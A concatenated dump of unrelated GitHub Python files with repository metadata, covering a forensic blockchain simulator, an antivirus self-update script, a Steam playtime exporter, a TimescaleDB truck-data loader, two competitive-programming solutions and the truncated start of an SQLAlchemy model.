{repr(v)}')\n # print(v.__dict__)\n\n print('\\n')\n print(f' Commands')\n for k, v in bc.blocks[blocknumber].data.commands.items():\n print(f' {k} {repr(v)}')\n else:\n raise summarizeblockError(f'Invalid block number {blocknumber}')\n\n\n def checkintegrity(bc):\n ''' verifies integrity of blockchain\n\n Checks entire chain of block hashes and signature of every block\n\n '''\n print('\\n')\n print(f'checking blockchain integrity...')\n for block in reversed(bc.blocks):\n if not block.genesisblock:\n if bc.verifypreviousblockhash(blocknumber=block.blocknumber):\n print(f'{block}.previousblockhash verified.')\n else:\n raise checkintegrityError(f'{block}.previousblockhash verification failed.') \n \n if bc.verifyblocksig(block=block):\n print(f'{block} signature verified')\n else:\n raise checkintegrityError(f'{block} signature verification failed') \n\n\n def blockdata(blocknumber=None):\n ''' show more detail about a block's data payload\n '''\n if 0 <= blocknumber <= bc.head:\n print(f'details {bc.blocks[blocknumber]}...')\n print('\\n')\n\n print(f' Assets')\n for k, v in bc.blocks[blocknumber].data.assets.items():\n print(f' {k} {repr(v)}')\n print(f' {v.__dict__}')\n\n print('\\n')\n print(f' Commands')\n for k, v in bc.blocks[blocknumber].data.commands.items():\n print(f' {k} {repr(v)}')\n print(f' {v.__dict__}')\n else:\n raise blockdataError(f'Invalid block number {blocknumber}')\n\n\n def dirasset(blocknumber=None, assetid=None):\n ''' Extract a Directory asset from a specified block\n '''\n try:\n print(f'{bc.blocks[blocknumber]}, dirasset: {assetid}')\n print(f'Dir path = {bc.blocks[blocknumber].data.assets[assetid].assetpath}')\n print(f'Dir hash = {bc.blocks[blocknumber].data.assets[assetid].dirhash}')\n print(f'Dir listing = {bc.blocks[blocknumber].data.assets[assetid].dirlisting}')\n if bc.blocks[blocknumber].data.assets[assetid].dirhashes is not None:\n for hash, file in sorted(bc.blocks[blocknumber].data.assets[assetid].dirhashes, \\\n key=lambda tpl: tpl[1]):\n print(hash, file)\n except:\n raise dirassetError(f'Error extracting dir asset {assetid} from block {blocknumber}')\n\n\n def fileasset(blocknumber=None, assetid=None):\n ''' Extract a FileHashOnly asset from a specified block\n '''\n try:\n print(f'{bc.blocks[blocknumber]}, fileasset: {assetid}')\n print(f'assetpath = {bc.blocks[blocknumber].data.assets[assetid].assetpath}')\n print(f'hash = {bc.blocks[blocknumber].data.assets[assetid].hash}')\n except:\n raise fileassetError(f'Error extracting filehash asset {assetid} from block {blocknumber}')\n\n\n def filewholeasset(blocknumber=None, assetid=None):\n ''' Extract a FileWhole asset from a specified block\n '''\n try:\n print('\\n')\n print(f'{bc.blocks[blocknumber]}, fileasset: {assetid}')\n print(f'assetpath = {bc.blocks[blocknumber].data.assets[assetid].assetpath}')\n print(f'hash = {bc.blocks[blocknumber].data.assets[assetid].hash}')\n print(f'filecontent:\\n{bc.blocks[blocknumber].data.assets[assetid].filecontent}')\n except:\n raise filewholeassetError(f'Error extracting filewhole asset {assetid} from block {blocknumber}')\n\n\n def filewholeremote(blocknumber=None, assetid=None):\n ''' Extract a FileWholeRemote asset from a specified block\n '''\n try:\n print('\\n')\n print(f'{bc.blocks[blocknumber]}, fileasset: {assetid}')\n print(f'command = {bc.blocks[blocknumber].data.assets[assetid].command}')\n print(f'hash = {bc.blocks[blocknumber].data.assets[assetid].hash}')\n print(f'---------- filecontent ---------:')\n print(f'{bc.blocks[blocknumber].data.assets[assetid].filecontent}')\n except:\n raise filewholeremoteError(f'Error extracting filewholeremote asset {assetid} from block {blocknumber}')\n\n\n def commandasset(blocknumber=None, cmdid=None):\n ''' Extract a Command asset from a specified block\n '''\n try:\n print('\\n')\n print(f'{bc.blocks[blocknumber]}, commandasset: {cmdid}')\n print(f'{bc.blocks[blocknumber].data.commands[cmdid]}')\n print(f'command output:')\n print('-'*30)\n print(f'{bc.blocks[blocknumber].data.commands[cmdid].cmdoutput}')\n except:\n raise commandassetError(f'Error extracting command asset {cmdid} from block {blocknumber}')\n\n\n def dirassethist(assetid=None):\n ''' Extract history of a dir asset\n '''\n print('\\n')\n print(f'Extracting history of directory asset {assetid}')\n print('-'*60)\n try:\n for block in bc.blocks[1:]:\n if assetid in block.data.assets:\n print(f'block {block.blocknumber}: {block.data.assets[assetid]}')\n # if Directory asset, print dirhash and dirhashes\n if isinstance(block.data.assets[assetid], Directory):\n print(f'dirhash = {block.data.assets[assetid].dirhash}')\n print('.'*30)\n # if we have file hashes, print them\n if block.data.assets[assetid].dirhashes is not None:\n for hash, file in sorted(block.data.assets[assetid].dirhashes, \\\n key=lambda tpl: tpl[1]):\n print(hash, file)\n else:\n print(f'AssetID {assetid} not a dir asset')\n print('-'*60)\n except:\n raise dirassethistError('Error extracting history of file asset')\n\n\n def fileassethist(assetid=None):\n ''' Extract history of a file asset\n '''\n print('\\n')\n print(f'Extracting history of file asset {assetid}')\n print('-'*60)\n try:\n for block in bc.blocks[1:]:\n if assetid in block.data.assets:\n print(f'block {block.blocknumber}: {block.data.assets[assetid]}')\n print(f'{block.data.assets[assetid].hash}')\n # if FileWhole or FileWholeRemote asset, print filecontent\n if isinstance(block.data.assets[assetid], (FileWhole)):\n print(f'{block.data.assets[assetid].filecontent}')\n if isinstance(block.data.assets[assetid], (FileWholeRemote)):\n print(f'{block.data.assets[assetid].command}')\n print(f'{block.data.assets[assetid].filecontent}')\n print('-'*60)\n except:\n raise fileassethistError('Error extracting history of file asset')\n\n\n def cmdhist(cmdid=None):\n ''' Extract history of a command asset\n '''\n print('\\n')\n print(f'Extracting history of command asset {cmdid}')\n print('-'*60)\n try:\n for block in bc.blocks[1:]:\n if cmdid in block.data.commands:\n print(f'block {block.blocknumber}: {block.data.commands[cmdid]}')\n print('.'*30)\n print(f'{block.data.commands[cmdid].cmdoutput}')\n print('-'*60)\n except:\n raise cmdhistError(f'Error extracting history of command asset {cmdid}')\n\n\n def sync():\n ''' Determine latest blockchain\n\n Evaluates previously downloaded blockchain files\n from each machine and determines the latest (longest) one.\n Integrity of each blockchain is verified.\n\n Input:\n 3 files previously downloaded from each machine,\n\n blockchain_pickle_m1\n blockchain_pickle_m2\n blockchain_pickle_m4\n\n Output:\n The latest blockchain file for syncing back to all machines,\n\n blockchain_pickle\n\n '''\n\n bc1 = 'blockchain_pickle_m1'\n bc2 = 'blockchain_pickle_m2'\n bc4 = 'blockchain_pickle_m4'\n if not os.path.isfile(bc1):\n raise syncError(f'Unable to locate file {bc1}')\n if not os.path.isfile(bc2):\n raise syncError(f'Unable to locate file {bc2}')\n if not os.path.isfile(bc4):\n raise syncError(f'Unable to locate file {bc4}')\n\n files = {'bc1': bc1, 'bc2': bc2, 'bc4': bc4}\n heads = {}\n longest = 0\n for k, file in files.items():\n bc = loadblockchain(file)\n print(f'{\"===\":*^50}')\n print(f'checking integrity of {file}')\n checkintegrity(bc)\n heads[k] = bc.head\n longest = max(longest, heads[k])\n\n for k in heads.keys():\n if heads[k] == longest:\n latest = files[k]\n\n echo(f'latest blockchain identified: {latest}: {longest} blocks\\n')\n shutil.copy2(latest, BLOCKCHAINFILE)\n echo(f'{BLOCKCHAINFILE} ready for syncing\\n')\n\n\n def echo(print_this):\n with open(LOGFILE, 'a') as f:\n unixtime = time()\n datetime = ctime(unixtime)\n tz = localtime(unixtime).tm_zone\n tzoffset = strftime('%z', localtime(unixtime))\n f.write(f'{unixtime:<16.4f}{datetime:<25}{print_this}')\n\n\n def comparehashes(assetid=None, block1=None, block2=None):\n ''' Compare asset hash between two blocks\n\n Compares a single assetid's hash between 2 blocks\n Answers the question:\n Did the asset hash change from block1 to block2?\n\n Input:\n assetid of a FileSystemAsset\n Two separate blocks containing this assetid\n\n Output:\n True, if the hashes are equal\n False, if the hashes differ\n\n '''\n if assetid is None or block1 is None or block2 is None:\n raise comparehashesError('arguments not supplied')\n\n elif not (assetid in block1.data.assets and assetid in block2.data.assets):\n raise comparehashesError(f'AssetID {assetid} not in both blocks')\n\n elif not (isinstance(block1.data.assets[assetid], FileSystemAsset) and \\\n isinstance(block2.data.assets[assetid], FileSystemAsset)):\n raise comparehashesError(f'AssetID {assetid} must be same type in both blocks')\n\n else:\n if isinstance(block1.data.assets[assetid], Directory) and \\\n isinstance(block2.data.assets[assetid], Directory):\n return block1.data.assets[assetid].dirhash == block2.data.assets[assetid].dirhash\n else:\n return block1.data.assets[assetid].hash == block2.data.assets[assetid].hash\n\n\n def blocksbyauthor(authorid=None, bc=None):\n ''' Extract all blocks by authorid from blockchain\n\n Returns a list of all blocks written by authorid\n Used by enumerateassets()\n\n '''\n if authorid is None or bc is None:\n raise blocksbyauthorError('arguments not supplied')\n\n lstblocks = []\n for block in bc.blocks:\n if block.authorid == authorid:\n lstblocks.append(block)\n return lstblocks\n\n\n def enumerateassets(lstblocks):\n ''' Enumerate all assetids present in a list of blocks\n\n Returns a set of all unique assetids in the blocks\n\n Input:\n A list of blocks\n\n Output:\n A set of unique assetids found in the list, of the form,\n {(assetid, classname), ...}\n\n Used by main()\n\n '''\n if len(lstblocks) == 0:\n raise enumerateassetsError('List of blocks is empty')\n\n setofassets = set()\n for block in lstblocks:\n for assetid in iter(block.data.assets):\n setofassets.add((assetid, block.data.assets[assetid].__class__.__name__))\n return setofassets # set of tuples\n\n\n def assethashchanges(blocks=None, assetid=None):\n ''' Identify asset hash changes across a list of blocks\n\n Returns a list of blocknumbers where asset hash changed from prior\n block. The list of blocks is assumed to be in proper order of\n increasing block number. If we lay out the blocks ordered from left to\n right, then we use 2 pointers moving from the right end (latest block)\n thru to the left end (earliest block), to identify sequences of\n identical hashes. The start of each sequence is the block where the\n hash has changed from the previous block (and previous sequence).\n\n Input:\n A list of blocks and an assetid\n\n Output:\n A list of those blocknumbers where assetid's hash changed\n\n '''\n if blocks is None or assetid is None:\n raise assethashchangesError('args not supplied')\n\n elif len(blocks) <= 1:\n raise assethashchangesError('Need 2 or more blocks')\n\n # initialize pointer i to index of last block in list\n # i marks the end of a hash sequence\n i = len(blocks) - 1\n\n # initialize pointer j to the index of block before i\n j = i - 1\n\n # initialize a list of blocknumbers\n # always include the first block\n l = [blocks[0].blocknumber]\n\n while j >= 0:\n hashesmatch = comparehashes(assetid=assetid, block1=blocks[j], block2=blocks[i])\n if hashesmatch:\n # move j to previous block\n j += -1\n elif not hashesmatch:\n # new hash sequence starts at block j+1\n l.append(blocks[j + 1].blocknumber)\n # move i to j, to mark end of prior hash sequence\n i = j\n # move j to previous block\n j += -1\n else:\n return l\n\n\n def dirdiff(assetid=None, blknum1=None, blknum2=None):\n ''' Shows the diff of a Directory asset between two blocks\n\n Shows what changed in a Directory asset, assetid, from block.blknum1\n to block.blknum2. The changes displayed are sourced from block.dirhashes.\n The directory asset must have a non-empty dirhashes attribute in both blocks\n because the comparison uses the list in this attribute.\n\n Input:\n an assetid which is a Directory asset\n blocknumber, blknum1, of a block containing assetid\n blocknumber, blknum2, of a block containing assetid\n\n Output:\n dict of dirhashes entries, added or removed,\n from block blknum1 to block blknum2\n\n '''\n if assetid is None or blknum1 is None or blknum2 is None:\n raise dirdiffError('args not supplied')\n\n elif not assetid in bc.blocks[blknum1].data.assets:\n raise dirdiffError(f'assetid {assetid} not in block {blknum1}')\n\n elif not assetid in bc.blocks[blknum2].data.assets:\n raise dirdiffError(f'assetid {assetid} not in block {blknum2}')\n\n elif not isinstance(bc.blocks[blknum1].data.assets[assetid], Directory):\n raise dirdiffError(f'block {blknum1}: assetid {assetid} not a Directory asset')\n\n elif not isinstance(bc.blocks[blknum2].data.assets[assetid], Directory):\n raise dirdiffError(f'block {blknum2}: assetid {assetid} not a Directory asset')\n\n elif not blknum1 < blknum2:\n raise dirdiffError('must have blknum1 < blknum2')\n\n elif bc.blocks[blknum1].data.assets[assetid].dirhashes is None or \\\n bc.blocks[blknum2].data.assets[assetid].dirhashes is None:\n raise dirdiffError('Empty dirhashes attribute')\n\n\n diff = {'removed': [], 'added': []}\n # symmetric difference\n s1 = set(bc.blocks[blknum1].data.assets[assetid].dirhashes)\n s2 = set(bc.blocks[blknum2].data.assets[assetid].dirhashes)\n symmdiff = s1 ^ s2\n\n for entry in symmdiff:\n if entry in s1:\n diff['removed'].append(entry)\n elif entry in s2:\n diff['added'].append(entry)\n\n return diff\n\n\n def extractallfilehashes():\n ''' Extract all unique file hashes per supplier\n\n The output files can be used for checking against known hashes\n Called from main()\n\n Input:\n Uses the currently loaded blockchain\n Output:\n Writes one text file per supplier containing unique file hashes\n from the set of assets monitored by the supplier.\n\n '''\n supplierfilehashes = {}\n for supplier in SUPPLIERS:\n supplierfilehashes[f'{supplier}'] = set()\n for block in bc.blocks[1:]:\n for assetid, asset in block.data.assets.items():\n if isinstance(asset, FileHashOnly):\n for supplier, hashset in supplierfilehashes.items():\n if block.authorid == supplier:\n hashset.add((asset.hash, asset.assetpath))\n if isinstance(asset, Directory):\n if asset.dirhashes is not None and len(asset.dirhashes) > 0:\n for hash, path in asset.dirhashes:\n for supplier, hashset in supplierfilehashes.items():\n if block.authorid == supplier:\n hashset.add((hash, path))\n\n for supplier in iter(supplierfilehashes):\n print('\\n')\n print('-'*60)\n print(f'{len(supplierfilehashes[supplier])} file hashes from supplier {supplier}:')\n print('-'*60)\n with open(f'{supplier}_hashes', 'a') as f:\n i = 0\n for hash, path in sorted(supplierfilehashes[supplier], key=lambda tpl: tpl[1]):\n f.write(f'{hash} {path}\\n')\n i += 1\n print(f'{i} unique hashes written to {supplier}_hashes')\n print('\\n')\n\n\n\n\n # ########################################################################\n # process command-line arguments\n # ########################################################################\n\n\n if args.subcommand == 'newbc':\n print('Creating new blockchain...')\n bc = createnewblockchain()\n saveblockchain()\n printsummary()\n\n elif args.subcommand == 'agent':\n if args.m1:\n AUTHORID = 'm1'\n ASSETLISTPATH = 'assetlist_m1'\n COMMANDLISTPATH = 'commandlist_m1'\n bc = loadblockchain()\n createnewblock()\n saveblockchain()\n printsummary()\n\n elif args.m2:\n AUTHORID = 'm2'\n ASSETLISTPATH = 'assetlist_m2'\n COMMANDLISTPATH = 'commandlist_m2'\n bc = loadblockchain()\n createnewblock()\n saveblockchain()\n printsummary()\n\n elif args.m4:\n AUTHORID = 'm4'\n ASSETLISTPATH = 'assetlist_m4'\n COMMANDLISTPATH = 'commandlist_m4'\n bc = loadblockchain()\n createnewblock()\n saveblockchain()\n printsummary()\n\n elif args.subcommand == 'admin':\n AUTHORID = 'm0'\n\n if args.sync:\n sync()\n\n if args.printsummary:\n bc = loadblockchain()\n printsummary()\n\n if args.checkintegrity:\n bc = loadblockchain()\n checkintegrity(bc)\n\n if args.summarizeblock is not None:\n bc = loadblockchain()\n summarizeblock(blocknumber=args.summarizeblock)\n\n if args.blockdata:\n bc = loadblockchain()\n blockdata(blocknumber=args.blockdata)\n\n if args.dirasset:\n bc = loadblockchain()\n dirasset(blocknumber=int(args.dirasset[0]), assetid=args.dirasset[1])\n\n if args.fileasset:\n bc = loadblockchain()\n fileasset(blocknumber=int(args.fileasset[0]), assetid=args.fileasset[1])\n\n if args.filewholeasset:\n bc = loadblockchain()\n filewholeasset(blocknumber=int(args.filewholeasset[0]), assetid=args.filewholeasset[1])\n\n if args.filewholeremote:\n bc = loadblockchain()\n filewholeremote(blocknumber=int(args.filewholeremote[0]), assetid=args.filewholeremote[1])\n\n if args.commandasset:\n bc = loadblockchain()\n commandasset(blocknumber=int(args.commandasset[0]), cmdid=args.commandasset[1])\n\n if args.dirassethist:\n bc = loadblockchain()\n dirassethist(assetid=args.dirassethist)\n\n if args.fileassethist:\n bc = loadblockchain()\n fileassethist(assetid=args.fileassethist)\n\n if args.cmdhist:\n bc = loadblockchain()\n cmdhist(cmdid=args.cmdhist)\n\n if args.hashchanges:\n bc = loadblockchain()\n authorid = args.hashchanges\n if authorid not in SUPPLIERS:\n raise hashchangesError(f'Unknown authorid {authorid}')\n\n authorblocks = blocksbyauthor(authorid=authorid, bc=bc)\n setoftuples = enumerateassets(authorblocks)\n assets = sorted(list(setoftuples), key=lambda tpl: tpl[0])\n print('\\n')\n print('-'*60)\n print(f' Blocks by supplier {authorid}:')\n print([block.blocknumber for block in authorblocks])\n print('-'*60)\n print(f' Assets by supplier {authorid}:')\n for asset in assets:\n print(asset)\n print('-'*60)\n print('\\n')\n print(f' Supplier {authorid} asset hash changes:')\n print('_'*50)\n for asset in assets:\n blknums = assethashchanges(blocks=authorblocks, assetid=asset[0])\n print(f'asset {asset} changed in blocks:')\n print(f' {sorted(list(blknums))}')\n print('_'*50)\n print('\\n')\n\n if args.dirdiff:\n bc = loadblockchain()\n assetid=args.dirdiff[0]\n blknum1=int(args.dirdiff[1])\n blknum2=int(args.dirdiff[2])\n diff = dirdiff(assetid=assetid, blknum1=blknum1, blknum2=blknum2)\n print('\\n')\n print('-'*60)\n print(f'Directory asset {assetid} changed from block {blknum1} to block {blknum2}')\n print('-'*60)\n for entry in diff['removed']:\n print(f'- {entry}')\n for entry in diff['added']:\n print(f'+ {entry}')\n print('-'*60)\n print('\\n')\n\n if args.hashlist:\n bc = loadblockchain()\n extractallfilehashes()\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"totaldefence/forensic-blockchain","sub_path":"bcsim.py","file_name":"bcsim.py","file_ext":"py","file_size_in_byte":68249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"25979403496","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 10 03:17:23 2022\n\n@author: kimse\n\"\"\"\n\nimport requests\nimport socket\nimport sqlite3\nimport subprocess\nimport os\n\n\nupdate_SERVER = \"https://raw.github.com/kimseongwoo61/test/master/version_info\"\ngit_link = \"https://github.com/kimseongwoo61/test.git\"\nupdate_version = ''\n\ndef conduct_UPDATE():\n if(check_Internet_connection() and check_Update_server()):\n if(compare_VERSION()):\n os.chdir(os.path.abspath( __file__ )+\"\\\\..\\\\..\\\\update\")\n result = subprocess.call(\"git clone \" + git_link , shell=True)\n print(os.getcwd())\n print(result)\n if(not result):\n print(os.getcwd())\n os.chdir(os.getcwd() + \"\\\\test\")\n print(os.getcwd())\n subprocess.call(\"dir\",shell=True)\n \n \n \n# antivirus 버전을 비교한다.\ndef compare_VERSION(): #이상하게 DB를 열 수 없다는 에러가 발생한다. 확인 바람.\n os.chdir(\"C:/Users/kimse/Desktop/DP/DB/\")\n con = sqlite3.connect(\"av_infomation.db\")\n cursor = con.cursor()\n current_version = str(cursor.execute(\"SELECT AV_version FROM sysinfo\").fetchall())[3:-4]\n cursor.close()\n\n left = list(map(int,current_version.split('.')))\n right = list(map(int,update_version.split('.')))\n\n \n for i in range(3):\n if(left[i] > right[i]):\n print(\"서버보다 버전이 높습니다!\")\n return False\n elif(left[i] < right[i]):\n print(\"업데이트 정보를 확인하였습니다! --> version_info : \"+update_version)\n return True\n elif(left[i] == right[i]):\n continue\n print(\"현재 최신버전 입니다!\")\n print(\"현재버전 : %s 서버버전 : %s\" % current_version, update_version)\n return False\n \n\n# 깃허브 업데이트 서버 연결 정보를 확인한다.\ndef check_Update_server(): \n res = requests.get(update_SERVER)\n if res.status_code != 200:\n print(\"잠시후 다시 연결 바랍니다.\")\n return False\n \n else:\n global update_version\n update_version = res.text\n return True\n\n\n#인터넷 연결유무를 확인한다.\ndef check_Internet_connection(): \n ip_addr = socket.gethostbyname(socket.gethostname())\n if ip_addr == \"127.0.0.1\":\n print(\"인터넷 연결을 확인해 주세요!!!\")\n return False\n \n else:\n return True\n \nconduct_UPDATE()\n","repo_name":"kimseongwoo61/DeepScan_AntiVirus","sub_path":"DP/SOURCE/Command/update_AV.py","file_name":"update_AV.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35904516355","text":"import os\nimport logging\nimport time\nimport argparse\nimport configparser\nimport requests\nimport pandas as pd\nfrom pathlib import Path\n\nlogger = logging.getLogger()\ntemps_debut = time.time()\n\n\ndef get_playtime_recent(api_key, user_id):\n url_recent = (\n \"https://api.steampowered.com/IPlayerService/GetRecentlyPlayedGames/v1/\"\n f\"?key={api_key}&steamid={user_id}\"\n )\n json_dict_recent = requests.get(url_recent).json()\n games_list_recent = []\n for game in json_dict_recent[\"response\"][\"games\"]:\n games_list_recent.append(\n {\n \"appid\": game[\"appid\"],\n \"playtime_2weeks\": int(game[\"playtime_2weeks\"]),\n }\n )\n return games_list_recent\n\n\ndef get_playtime(api_key, user_id):\n url = (\n \"http://api.steampowered.com/IPlayerService/GetOwnedGames/v0001/\"\n f\"?key={api_key}&steamid={user_id}&format=json\"\n )\n json_dict = requests.get(url).json()\n games_list = []\n for game in json_dict[\"response\"][\"games\"]:\n games_list.append(\n {\n \"appid\": game[\"appid\"],\n \"playtime\": game[\"playtime_forever\"],\n \"playtime_windows\": game[\"playtime_windows_forever\"],\n \"playtime_mac\": game[\"playtime_mac_forever\"],\n \"playtime_linux\": game[\"playtime_linux_forever\"],\n }\n )\n return games_list\n\n\ndef main():\n args = parse_args()\n\n config = configparser.ConfigParser()\n try:\n config.read(\"config.ini\")\n except Exception:\n raise FileNotFoundError(\n \"No config file found. Be sure you have a config.ini file.\"\n )\n try:\n api_key = os.environ.get(\"STEAM_API_KEY\")\n if not api_key:\n api_key = config[\"steam\"][\"api_key\"]\n except Exception:\n raise ValueError(\"No api_key found. Check your config file.\")\n\n if args.user_id:\n user_id = args.user_id\n else:\n try:\n user_id = os.environ.get(\"STEAM_USERID\")\n if not user_id:\n user_id = config[\"steam\"][\"user_id\"]\n except Exception:\n raise ValueError(\n \"No user specified. Specify a user_id directive in your config file or use the -u/--user_id flag\"\n )\n\n Path(\"Exports\").mkdir(parents=True, exist_ok=True)\n\n dict_games = get_playtime(api_key, user_id)\n dict_games_recent = get_playtime_recent(api_key, user_id)\n\n df = pd.DataFrame(dict_games)\n df_recent = pd.DataFrame(dict_games_recent)\n df = pd.merge(df, df_recent, how=\"left\", on=[\"appid\"])\n df[\"playtime_2weeks\"] = df[\"playtime_2weeks\"].fillna(0.0).astype(int)\n filename = args.filename if args.filename else f\"Exports/playtime_{user_id}.csv\"\n df.to_csv(filename, sep=\"\\t\", index=False)\n logger.info(f\"Output file: {filename}.\")\n\n logger.info(\"Runtime : %.2f seconds.\" % (time.time() - temps_debut))\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=\"export playtime of games played by a Steam user.\"\n )\n parser.add_argument(\n \"--debug\",\n help=\"Display debugging information\",\n action=\"store_const\",\n dest=\"loglevel\",\n const=logging.DEBUG,\n default=logging.INFO,\n )\n parser.add_argument(\n \"-u\",\n \"--user_id\",\n help=\"User id to extract the games data from (steamID64). Default : user in config.ini\",\n type=str,\n )\n parser.add_argument(\n \"-f\",\n \"--filename\",\n help=\"Override export filename.\",\n type=str,\n )\n args = parser.parse_args()\n\n logging.basicConfig(level=args.loglevel)\n return args\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dbeley/steam_stats","sub_path":"scripts/get_playtime.py","file_name":"get_playtime.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34518065980","text":"table_name = 'trucks'\n\nimport sys\nimport psycopg2\nfrom psycopg2 import extras\nimport json\nimport time\nimport os\nfrom multiprocessing import Pool\nfrom functools import partial\n\nclass TruckObservation(object):\n def __init__(self, j):\n tmp = json.loads(j)\n\n self.latitude = tmp['latitude']\n self.longitude = tmp['longitude']\n self.speed = tmp['speed']\n self.speed_unit = tmp['speed_unit']\n self.temperature = tmp['temperature']\n self.temperature_unit = tmp['temperature_unit']\n self.EventProcessedUtcTime = tmp['EventProcessedUtcTime']\n self.ConnectionDeviceId = tmp['IoTHub']['ConnectionDeviceId']\n\n # I know, this is not nice, quick and dirty for the purposes of this blog\n def __getitem__ (self, index):\n if index == 0:\n return self.latitude\n if index == 1:\n return self.longitude\n if index == 2:\n return self.speed\n if index == 3:\n return self.speed_unit\n if index == 4:\n return self.temperature\n if index == 5:\n return self.temperature_unit\n if index == 6:\n return self.EventProcessedUtcTime\n if index == 7:\n return self.ConnectionDeviceId\n else:\n return 0\n\n def __len__(self):\n return 8\n\ndef files_loader(connection_string, table_name, files):\n pool = Pool(processes=5)\n func = partial(pg_load, connection_string, table_name)\n\n while len(files) > 0:\n print(len(files))\n files_to_load = files[0:5]\n files = files[5::]\n pool.map(func, files_to_load)\n\ndef pg_load(connection_string, table_name, file_path): \n sql = \"\"\"INSERT INTO trucks(latitude, longitude, speed, speed_unit, temperature, temperature_unit, eventprocessedutctime, connectiondeviceid) \n VALUES %s\"\"\"\n observations = [] \n\n conn = psycopg2.connect(connection_string)\n print(\"Connecting to Database\")\n cur = conn.cursor() \n \n f = open(file_path, \"r\")\n for x in f: \n observations.append(TruckObservation(x)) \n \n print(\"Execute_values\")\n extras.execute_values(cur, sql, observations)\n cur.execute(\"commit;\")\n\n conn.close()\n print(\"DB connection closed.\")\n\n del observations[:]\n\ndirectory_path = sys.argv[1]\nconnection_string = sys.argv[2]\n\nfiles = []\nfor r, d, f in os.walk(directory_path):\n for file in f:\n files.append(os.path.join(r, file))\n \nstart = time.time()\nfiles_loader(connection_string, table_name, files)\nend = time.time()\nprint(\"Loaded data into {}\".format(table_name))\nprint(\"Execution time: {}\".format(end - start))","repo_name":"murdockcrc/timeseries-loader","sub_path":"timescale/timescale.py","file_name":"timescale.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"601849276","text":"# https://www.acmicpc.net/problem/1543\n# 접근 방법 \n# 전체 문서의 문자를 하나씩 탐색하며 만약 검색하고 싶은 단어의 첫글자와 같다면 검색하고 싶은 단어의 인덱스도 하나씩 증가시키며 비교한다.\n# 이때 검색하고 싶은 단어를 모두 탐색했는데 검색하고 싶은 단어와 동일하다면 이를 하나씩 카운트한다.\n\n# 문서의 길이는 최대 2500이므로 길지 않기에 리스트로 변환하지 않고, 문자열로 처리한다.\n\n# document = [x for x in input()] # 인덱싱을 통한 반복을 위해 리스트 형태로 문서 입력\ndocument = input()\nvoca = input() # 검색하고 싶은 단어 입력\n\n# count = 0 # 중복되지 않게 단어가 등장한 횟수 초기화\n# voca_index = 0 # 검색하고 싶은 단어의 인덱스 초기화\n\n# # 문서 탐색\n# for x in document:\n\n# # 찾고자 하는 문자와 현재 문서에서 탐색 중인 문자가 같은 경우 voca_index += 1\n# if voca[voca_index] == x:\n# voca_index += 1\n\n\n# else:\n# voca_index = 0\n \n# # 검색하고자 하는 단어의 인덱스가 단어의 길이와 같아질 때 count +1, voca_index 초기화\n# if voca_index == len(voca):\n# count += 1\n# voca_index = 0\n\n\n# print(count)\n\n\n# 접근 방법 2\n# 문자열의 길이가 2500까지이므로 현재 탐색하고자하는 문서의 길이만큼 매번 탐색을 진행한다.\nstart_index = 0\nend_index = len(voca)\ncount = 0\n\nwhile end_index <= len(document):\n if voca == ''.join(document[start_index:end_index]):\n count += 1\n start_index += len(voca)\n end_index += len(voca)\n else:\n start_index += 1\n end_index += 1\n\nprint(count)\n\n# 접근방법 3\n# count함수를 사용한다.\nprint(document.count(voca))","repo_name":"kong-hana01/Coding-Test","sub_path":"그리디/정리완료/문서검색_1543.py","file_name":"문서검색_1543.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"26032630452","text":"t = int(input())\nmemo = {}\ngrid = []\n\n\ndef nimber(i1, j1, i2, j2):\n if i2 <= i1 or j2 <= j1:\n return 0, 0\n if(i1, j1, i2, j2) in memo:\n return memo[(i1, j1, i2, j2)]\n prohibited_i = set()\n prohibited_j = set()\n for i in range(i1, i2):\n for j in range(j1, j2):\n if grid[i][j]:\n prohibited_i.add(i)\n prohibited_j.add(j)\n successor_nimbers = set()\n nim0s = 0\n # H moves\n for i in range(i1, i2):\n if i in prohibited_i:\n continue\n nim = nimber(i1, j1, i, j2)[0] ^ nimber(i+1, j1, i2, j2)[0]\n successor_nimbers.add(nim)\n if nim == 0:\n nim0s += j2-j1\n # V moves\n for j in range(j1, j2):\n if j in prohibited_j:\n continue\n nim = nimber(i1, j1, i2, j)[0] ^ nimber(i1, j+1, i2, j2)[0]\n successor_nimbers.add(nim)\n if nim == 0:\n nim0s += i2-i1\n nim = 0\n while True:\n if nim not in successor_nimbers:\n memo[(i1, j1, i2, j2)] = nim, nim0s\n return nim, nim0s\n else:\n nim += 1\n\n\nfor casen in range(1, t+1):\n r, c = list(map(int, input().split()))\n memo.clear()\n grid.clear()\n for i in range(r):\n row = input().strip()\n row = [c != '.' for c in row]\n grid.append(row)\n _, nim0s = nimber(0, 0, r, c)\n print(\"Case #{}: {}\".format(casen, nim0s))\n","repo_name":"brok3nh3art1981/brok3nh3art1981","sub_path":"tex/googlecodejam/2019_1c/c/input/73rd_Arios16_org.py","file_name":"73rd_Arios16_org.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"42732583615","text":"from sqlalchemy import (\n\tBoolean,\n\tColumn,\n\tForeignKey,\n\tInteger,\n\tString,\n\tDate,\n)\n\nfrom sqlalchemy.orm import relationship\n\nfrom main.database.base_class import Base\n\nfrom main.utils.sqlalchemy import (\n\tAwareDateTime,\n\tResourceMixin,\n)\n\n\n\nclass ProgramModel(\n\tBase,\n\tResourceMixin,\n):\n\n\t__tablename__ = 'programs'\n\n\tid = Column(\n\t\tInteger,\n\t\tprimary_key=True,\n\t)\n\n\n\tname = Column(\n\t\tString,\n\t)\n\n\n\tprogram_instances = 